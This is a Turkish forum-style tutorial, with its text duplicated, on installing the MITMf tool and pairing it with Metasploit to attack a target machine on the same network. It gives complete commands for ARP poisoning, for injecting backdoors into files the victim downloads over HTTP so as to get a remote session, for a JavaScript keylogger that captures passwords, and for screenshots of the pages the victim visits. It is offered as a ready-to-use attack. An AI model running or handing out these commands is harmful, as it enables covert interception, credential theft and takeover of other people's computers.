R
Rolesa
Mitmf kurulumu
Başka Bir terminale
Gerekli Materyalleri kurduk manuel kurma sebebimiz tool kendisi kurarmuyor.
Şimdi github linkimizi clonelayalım
indirdiğimiz klasörün içerisindeki requirements.txt dosyasını kurun
Herşey bitti şuanda py uzantılı dosyamızı açabilriz.
Şimdi gelelim konularımıza
Ağdaki bilgisayarın indirdiği tüm dosyalara backdoor koyma .
Not = Httpli siteler
İlk olarak terminalimizde metasploit açalım
Burdaki passwordu kopyalıyoruz ve yeni bir terminal açıyoruz
Ben dosyayı leafpad ile aççağım siz ne ile açarsanız artık
Açılan leafpad penceremizde metasploit adı altında passwordlar port ayarları olcak ilk terminalde
yazarak aldığımız passwordu açılan leafpaddeki passwordun yerine yazarak kaydediyoruz . Eğer ben uğraşamam dersenizde
olarakda yazabilirsiniz. M
etasploitimiz arkada açıkken yeni bir terminal açıp şu komutları yazıyoruz
Şimdi bu kodu açalım yazdığımız komutlar ne işe yarıyormuş kendinize göre nasıl editlersiniz vs .
-i : Interface Belirtmemize Yarar (eth0, wlan0, enp2s0)
–spoof : Agı Dinlemeye Baslar.
–arp : Arp Poisoning Saldirisi Ile Trafigi Ustumuze Gecirir.
–gateway : Gateway IP Adresini Yazacagimiz Kısım
olarak öğrenebilirsiniz.
–target : Hedef IP Adresini Yazacagimiz Kısım.
evet şimdi ağ dinleniyor karşı kişi bilgisayarına indirdiği dosyaya backdoor yerleştirilcektir karşı bilgisayar dosyayı aktif hale getirdiğinde metasploitimize bilgirim gelcektir . geldikten sonra
yazarak bağlanıyoruz işte bu kadar şimdi karşı bilgisayara erişim sağladık .
Şimdi Keylogger özelliğine bakalım
–jskeylogger : Web Sayfasi Uzerinde Basilan Tus lari Algılamaya yarar.
kullancağımız komut budur isterseniz önceki komutun sonuna da ekleyip 2 faktörlü bir silaha dönüştürebilirsiniz.
yazarak bekliyoruz --spoof komutunu yazma sebebimizde hangi sitieye girdiği öğrenmek. Yani keylogger sayesinde aldığımız şifrenin hangi siteye ait olduğunu öğrenmek.
Şimdide karşı kişinin girdiği sayfanın jpg halini almak yani screen görüntü almamızı sağlıyacak komutumuz olan
kullanalım .
karşı kişi hangi sayfaya girerse
klasörüne kaydedilcektir.
Kullanımı kolay bir tooldur normalde bunları manuel olarak anlatcaktım ama aklıma mitmf geldi ne uğraşıyorum direk tool anlatımı yapayım dedim bende
Code:
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
Code:
pip install virtualenvwrapper
Code:
source /usr/bin/virtualenvwrapper.sh
Code:
source /usr/bin/virtualenvwrapper.sh
Code:
mkvirtualenv MITMf -p /usr/bin/python2.7
Code:
git clone https://github.com/byt3bl33d3r/MITMf.gitindirdiğimiz klasörün içerisindeki requirements.txt dosyasını kurun
Code:
pip install -r requirements.txtŞimdi gelelim konularımıza
Ağdaki bilgisayarın indirdiği tüm dosyalara backdoor koyma .
Not = Httpli siteler
İlk olarak terminalimizde metasploit açalım
Code:
msfconsole
Code:
load msgrpc
Code:
su -
Code:
leafpad /usr/share/mitmf/config/mitmf.conf
Code:
load msgrpc
Code:
load msgrpc Pass=yenişifreetasploitimiz arkada açıkken yeni bir terminal açıp şu komutları yazıyoruz
Code:
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.177.2 --target 192.168.177.33 --filepwn-i : Interface Belirtmemize Yarar (eth0, wlan0, enp2s0)
–spoof : Agı Dinlemeye Baslar.
–arp : Arp Poisoning Saldirisi Ile Trafigi Ustumuze Gecirir.
–gateway : Gateway IP Adresini Yazacagimiz Kısım
Code:
route -n–target
evet şimdi ağ dinleniyor karşı kişi bilgisayarına indirdiği dosyaya backdoor yerleştirilcektir karşı bilgisayar dosyayı aktif hale getirdiğinde metasploitimize bilgirim gelcektir . geldikten sonra
Code:
sessions -i 1Şimdi Keylogger özelliğine bakalım
–jskeylogger : Web Sayfasi Uzerinde Basilan Tus lari Algılamaya yarar.
kullancağımız komut budur isterseniz önceki komutun sonuna da ekleyip 2 faktörlü bir silaha dönüştürebilirsiniz.
Code:
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.177.2 --target 192.168.177.33 --jskeyloggerŞimdide karşı kişinin girdiği sayfanın jpg halini almak yani screen görüntü almamızı sağlıyacak komutumuz olan
Code:
--screen
Code:
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.177.2 --target 192.168.177.33 --screen
Code:
/var/log/mitmfKullanımı kolay bir tooldur normalde bunları manuel olarak anlatcaktım ama aklıma mitmf geldi ne uğraşıyorum direk tool anlatımı yapayım dedim bende